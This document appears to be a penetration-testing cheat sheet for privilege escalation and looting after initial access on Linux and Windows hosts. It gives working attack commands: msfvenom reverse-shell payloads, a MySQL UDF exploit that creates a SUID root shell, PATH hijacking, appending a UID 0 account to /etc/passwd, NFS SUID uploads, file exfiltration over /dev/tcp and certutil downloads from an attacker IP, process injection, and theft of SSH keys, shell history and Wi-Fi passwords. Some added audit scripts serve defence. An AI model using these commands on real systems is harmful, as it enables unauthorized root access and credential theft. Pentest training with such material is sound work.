What to do once you're on the Box¶
sudo -l lists what the current user may run with sudo; entries tagged NOPASSWD need no password. Also keep an eye on the environment variables that are inherited (the env_keep entries in the "Matching Defaults" lines of the same output).
Check if shared-library loading is possible: if LD_PRELOAD or LD_LIBRARY_PATH is kept, a library you wrote gets loaded into whatever you run with sudo.
find / -type f -a \( -perm -u+s -o -perm -g+s \) -ls 2>/dev/null to find SUID, SGID files.
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh to get
the full information about the box, including SUID/SGID files you're allowed to execute and your sudo rules. Piping into sh runs the script straight away; download it first if you want to read it or if the box has no outbound connectivity.
You can also run another script, which is also very good:
wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh; chmod 700 lse.sh; ./lse.sh
You can also run
wget https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh; sh ./LinEnum.sh which is an alternative to linPEAS.
To switch between users, once you have the credentials, you can use
su <username>
Have a thorough read of which files/services can be executed as root from the current user and check with https://gtfobins.github.io/ how they can be exploited.
Here are the easiest ones.
Cookbooks for Privilege Escalations:
* https://tryhackme.com/room/linuxprivesc
* https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md
* PayloadsAllTheThings - Methodology and Resources/Linux - Privilege Escalation.md
* https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
* https://payatu.com/guide-linux-privilege-escalation
Writable /etc/passwd and /etc/shadow file¶
In case /etc/passwd is writable we can append a line to it that adds a new user with UID 0, i.e. a second root.
In case /etc/shadow is writable you can replace password hashes (root's, for example) with one you generated yourself.
The password hash is the second colon-separated field of each line, i.e. the text between the first two colons.
There are several ways to generate a new hash.
openssl passwd -6 -salt <somesalt> <newpassword> # -6 = SHA-512 crypt, the format a modern /etc/shadow uses (-1 gives the older MD5 crypt) # -salt = optional, otherwise a random salt is generated; the salt is what defeats precomputed (rainbow-table) attacks
mkpasswd -m sha-512 <newpassword>
Add a new user to /etc/passwd
echo <username>:<passwordhash>:0:0:<optional comment>:/root:/bin/bash >> /etc/passwd
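The script below is an added example and not part of the original page. It checks the conditions this section relies on, and the traces the technique leaves behind: whether /etc/passwd or /etc/shadow is writable by the current user, which accounts have UID 0 besides root, and which accounts carry a hash (or no password at all) directly in /etc/passwd instead of an "x" that defers to /etc/shadow. It also builds the line the echo above appends, using openssl passwd -6. The function names and the output labels are my own; it takes the files as arguments so it can be run against copies.

```bash
#!/bin/bash
# Added example: audit passwd/shadow for the conditions used in the
# "writable /etc/passwd and /etc/shadow" technique. Usage:
#   audit_auth /etc/passwd /etc/shadow
#   root_entry backdoor 'Password1' >> /etc/passwd   (only if passwd is writable)

# Accounts with UID 0 that are not named root.
extra_root_accounts() {            # extra_root_accounts <passwd-file>
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Accounts whose password field is neither "x" (shadowed) nor locked ("*"/"!").
# An empty field means the account has no password at all.
hashes_in_passwd() {               # hashes_in_passwd <passwd-file>
    awk -F: '$2 != "x" && $2 !~ /^[*!]/ { print $1 }' "$1"
}

# "<file> <mode> <owner>" for each given file the current user can write to.
writable_auth_files() {            # writable_auth_files <file>...
    local f
    for f in "$@"; do
        if [ -w "$f" ]; then
            echo "$f $(ls -ld "$f" | awk '{ print $1, $3 }')"
        fi
    done
}

# Build the line this section appends: SHA-512 crypt hash, UID/GID 0, root's
# home and shell. Needs openssl 1.1.1 or newer for the -6 option.
root_entry() {                     # root_entry <username> <password>
    local hash
    hash=$(openssl passwd -6 "$2") || return 1
    printf '%s:%s:0:0::/root:/bin/bash\n' "$1" "$hash"
}

# One report with a label per finding.
audit_auth() {                     # audit_auth <passwd-file> <shadow-file>
    writable_auth_files "$1" "$2" | sed 's/^/WRITABLE /'
    extra_root_accounts "$1"      | sed 's/^/UID0     /'
    hashes_in_passwd "$1"         | sed 's/^/HASH     /'
}
```

On a clean box audit_auth prints nothing; a UID0 or HASH line is exactly the artefact this technique leaves, so the same script doubles as a quick post-incident check.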
Escaping Vi Editor¶
If vi is listed in the
sudo -l output, you can simply run
sudo vi and then
:!sh (or :shell) to get a root shell through the editor. The same works for vim; GTFOBins lists the equivalent escapes for other editors and pagers.
cat /etc/crontab to see scheduled tasks (also look in /etc/cron.d/ and /var/spool/cron/); maybe one of them is exploitable, either because the script it runs is writable by you or because it calls a command without an absolute path.
Take a look at the environment variables defined in the crontab file: cron resolves unqualified commands through the PATH= set there, not through your own, so a writable directory early in that PATH lets you plant a script with the same name as the one a job calls.
In case a script is executed you can create a payload to create a bind/reverse shell with
msfvenom -p cmd/unix/reverse_netcat lhost=<local/remote ip> lport=8888 R. Don't forget to listen for it with
nc -lvnp 8888.
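The check below is an added example, not code from the original page. It walks a crontab in /etc/crontab format (five time fields or an @keyword, then the user, then the command) and reports the two conditions described above: a job whose script is writable by the current user, and a job that calls a command by bare name for which a writable directory appears in cron's PATH before the real binary. The output labels and function names are my own; the default PATH of /usr/bin:/bin is what cron uses when the file sets none.

```bash
#!/bin/bash
# Added example: audit a system crontab for writable job scripts and for
# commands that can be hijacked through the crontab's own PATH= line.
# Usage: check_cron_file /etc/crontab

# Print "user<TAB>command" for each job line, skipping comments, blank lines
# and VAR=value assignments. Handles both "m h dom mon dow user cmd" and
# "@reboot user cmd" forms.
cron_jobs() {
    grep -vE '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$1" |
    awk '{ if ($1 ~ /^@/) { user = $2; n = 2 } else { user = $6; n = 6 }
           for (i = 1; i <= n; i++) $i = ""
           sub(/^ +/, ""); print user "\t" $0 }'
}

# PATH that cron applies to this file (last PATH= line wins, quotes stripped),
# or cron's built-in default when the file sets none.
cron_path() {
    local p
    p=$(grep -E '^[[:space:]]*PATH=' "$1" | tail -n 1 | cut -d= -f2- | tr -d '"')
    echo "${p:-/usr/bin:/bin}"
}

# WRITABLE  <user> <script>      : absolute script we can edit
# HIJACKABLE <user> <cmd> via <d>: bare command, and writable dir <d> is
#                                  searched before any dir that holds it
check_cron_file() {
    local file=$1 path user cmd exe d
    local -a dirs
    path=$(cron_path "$file")
    IFS=: read -ra dirs <<< "$path"
    cron_jobs "$file" | while IFS=$'\t' read -r user cmd; do
        exe=${cmd%% *}                       # first word of the command line
        case $exe in
            /*) if [ -w "$exe" ]; then echo "WRITABLE $user $exe"; fi ;;
            *)  for d in "${dirs[@]}"; do
                    if [ -e "$d/$exe" ]; then break; fi      # real binary found first
                    if [ -d "$d" ] && [ -w "$d" ]; then
                        echo "HIJACKABLE $user $exe via $d"; break
                    fi
                done ;;
        esac
    done
}
```

A HIJACKABLE finding means the payload from the msfvenom line above, saved under that command name in the reported directory and made executable, runs as the listed user the next time the job fires.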
Exploiting PATH environment variable¶
The PATH environment variable, defined as
/path1:/path2:/path3, holds all directories that are searched, in that order, for an executable given without a path. Unlike Windows, the current directory is not searched, unless the PATH contains a "." entry (or an empty entry, such as a leading or trailing colon).
To exploit the PATH we need a SUID executable which calls another executable without path information. Use
strings <executable> to get a hint whether a bare command name occurs in it, or run the executable and watch with
top or ps which sub-executable is spawned; ltrace -S <executable> or strace -f -e trace=execve <executable> show the exact calls if those tools are installed.
The next step is to create a script with the name of the called executable containing a bind/reverse shell or simply just
/bin/bash, and to put its directory in front of the PATH variable:
cd /tmp
echo "/bin/bash" > ls
chmod +x ls
export PATH=/tmp:$PATH
# execute the SUID file now; when it calls "ls" it gets /tmp/ls
If the shell you get is not root, the binary only raised the effective UID and bash dropped it again; use /bin/bash -p in the script, which keeps the effective UID.
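The script below is an added example and not part of the original page. Since a real SUID binary cannot be created without root, it uses an ordinary shell command as a stand-in for the vulnerable program and shows the mechanism itself: a fake ls planted in a writable directory that is prepended to PATH is what a bare "ls" resolves to, while a call with an absolute path is unaffected. resolve_in_path shows the first-match rule that makes prepending work and makes a "." entry dangerous. The function names and the HIJACKED marker are my own.

```bash
#!/bin/bash
# Added example: PATH hijacking with a stand-in for the SUID program.
# The payload only prints a marker; in the real attack it would be
# /bin/bash -p or a reverse shell.

# Create a writable directory holding a fake <name> that runs <payload-command>.
plant_fake() {                 # plant_fake <dir> <name> <payload-command>
    mkdir -p "$1"
    printf '#!/bin/sh\n%s\n' "$3" > "$1/$2"
    chmod +x "$1/$2"
}

# Run <cmd-line> the way the vulnerable program would (via a shell, e.g.
# system()), with <dir> prepended to PATH.
run_as_victim() {              # run_as_victim <dir> <cmd-line>
    PATH="$1:$PATH" sh -c "$2"
}

# Which directory resolves <name> under <path>? The first hit wins, so a
# writable directory in front of /usr/bin (or a "." entry while sitting in
# a writable directory) takes precedence over the real binary.
resolve_in_path() {            # resolve_in_path <name> <path>
    local IFS=: d
    for d in $2; do
        if [ -x "$d/$1" ]; then echo "$d"; return 0; fi
    done
    return 1
}

demo() {
    local dir
    dir=$(mktemp -d)
    plant_fake "$dir" ls 'echo HIJACKED'
    echo "bare call:     $(run_as_victim "$dir" 'ls')"         # fake ls runs
    echo "absolute call: $(run_as_victim "$dir" '/bin/ls /')"  # real ls runs
    echo "ls resolves to: $(resolve_in_path ls "$dir:/usr/bin:/bin")"
    rm -rf "$dir"
}
```

The absolute-path call is also the fix on the defensive side: a SUID program should exec helpers by full path or reset PATH itself, because the caller controls the environment it inherits.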
In case the mysql server is accessible and is executed as root, we can load a dynamic library (a user-defined function, UDF) that offers us root rights. https://www.exploit-db.com/exploits/1518
Check first: ps -ef | grep mysqld shows which user the server runs as, and SHOW VARIABLES LIKE 'plugin_dir'; shows where the library has to be written. If secure_file_priv is set, the INTO DUMPFILE step below is refused.
cd /home/user/tools/mysql-udf
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
exit
Then run /tmp/rootbash -p; the -p keeps the root effective UID that the SUID bit grants.
Upload SUID files via NFS¶
In case the victim server has network shares open (for NFS: showmount -e $IP or nmap -p 111,2049 --script=nfs-showmount $IP from the attacker box, or cat /etc/exports on the victim; for SMB: nmap -p 135,445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP) you can try to create a file on this share with the SUID bit set from the attacker server and execute it on the victim server.
Try to read the
/etc/exports file which contains the option flags for each share.
The no_root_squash flag means that the remote root user keeps UID 0 on the share, so a SUID binary you create there as root stays owned by root. With the default root_squash, remote root is mapped to nobody: the SUID bit itself survives, but the file is owned by nobody, so executing it gives you nobody's privileges, not root's.
# attacker box (as root)
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.10.10:/share /tmp/nfs   # use vers=3 if the server refuses NFSv2
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell
chmod +xs /tmp/nfs/shell
# victim box: the file appears under the exported path, here /share
/share/shell
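The parser below is an added example and not part of the original page. It reads an /etc/exports file and lists the exports that disable root squashing, which is the precondition for the upload above to yield a root-owned SUID binary. Each exports line is "<path> <client>(options) ..."; root_squash is the default, so only an explicit no_root_squash counts. The function name and the sample file in the comments are my own.

```bash
#!/bin/bash
# Added example: find NFS exports where remote root keeps UID 0.
# Usage: unsquashed_exports /etc/exports
# Prints "<path> <client>" for every client entry carrying no_root_squash.

unsquashed_exports() {         # unsquashed_exports <exports-file>
    local path rest entry opts client
    local -a entries
    grep -vE '^[[:space:]]*(#|$)' "$1" | while read -r path rest; do
        # one "client(opt,opt)" per word; read -a avoids glob expansion of "*"
        read -ra entries <<< "$rest"
        for entry in "${entries[@]}"; do
            client=${entry%%\(*}             # text before the parenthesis
            opts=${entry#*\(}; opts=${opts%\)}  # text inside the parentheses
            case ",$opts," in
                *,no_root_squash,*) echo "$path $client" ;;
            esac
        done
    done
}
```

A hit here, combined with a client entry that covers your attacker IP, is what makes the chmod +xs on the attacker side meaningful; against a root_squash export the same file ends up owned by nobody.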
Kernel exploits are one of the last resorts to get higher privileges because a failed attempt can leave the target server in an unstable state or crash it outright.
Linux Exploit Suggester¶
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
chmod +x les.sh
./les.sh
Each found exploit has a level which indicates how likely the attempt is to succeed:
* Highly probable - assessed kernel is most probably affected and there's a very good chance that the PoC exploit will work out of the box without any major modifications.
* Probable - it's possible that the exploit will work but most likely customization of the PoC exploit will be needed to suit your target.
* Less probable - additional manual analysis is needed to verify if the kernel is affected.
* Unprobable - highly unlikely that the kernel is affected (exploit is not displayed in the tool's output).
Linux Exploit Suggester 2¶
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl -O les2.pl
perl les2.pl
Send files: VICTIM -> ATTACKER¶
nc -lvnp $PORT > /file_to_save # on the attacker, start this first
cat $FILE > /dev/tcp/$HOSTIP/$PORT # on the victim; /dev/tcp is a bash feature and does not work in sh/dash
Windows¶
- winPEAS, RAW: https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
certutil.exe -urlcache -split -f "http://10.8.220.86:4000/winPEAS.bat" wp.bat
- PowerUp, RAW: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
certutil.exe -urlcache -split -f "http://10.8.220.86:4000/PowerUp.ps1" pu.ps1
. ./pu.ps1
Invoke-AllChecks
- Check if you can escalate with Priv2Admin
- See if you can create an hidden system account with CreateHiddenAccount
Migrate to another process (Empire agent commands):
ps to list processes and pick a stable one (e.g. explorer)
psinject <Listener> <ProcessID> with the listener name and the process ID
Get the Windows build number:
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId (from 20H2 onwards ReleaseId stays at 2009; read the DisplayVersion value instead)
If the build is older than Win10 2004, try
powershell/privesc/printdemon (CVE-2020-1048) with the base64 part of the stager and
shell restart-computer -force for higher privilege.
Get the Loot¶
Get the ssh key!¶
cat ~/.ssh/id_rsa
cat /root/.ssh/id_rsa
Get the history of an user¶
cat ~/.*history | less
Get config files¶
Search the user's home directory with
ls -la and see if you can find configuration files (dotfiles and application configs often hold credentials).
Get wlan/wifi passwords on a Windows machine (no admin privileges needed)¶
netsh wlan export profile key=clear (writes one XML file per profile into the current directory; netsh wlan show profile name="<SSID>" key=clear prints a single profile, key included, to the console)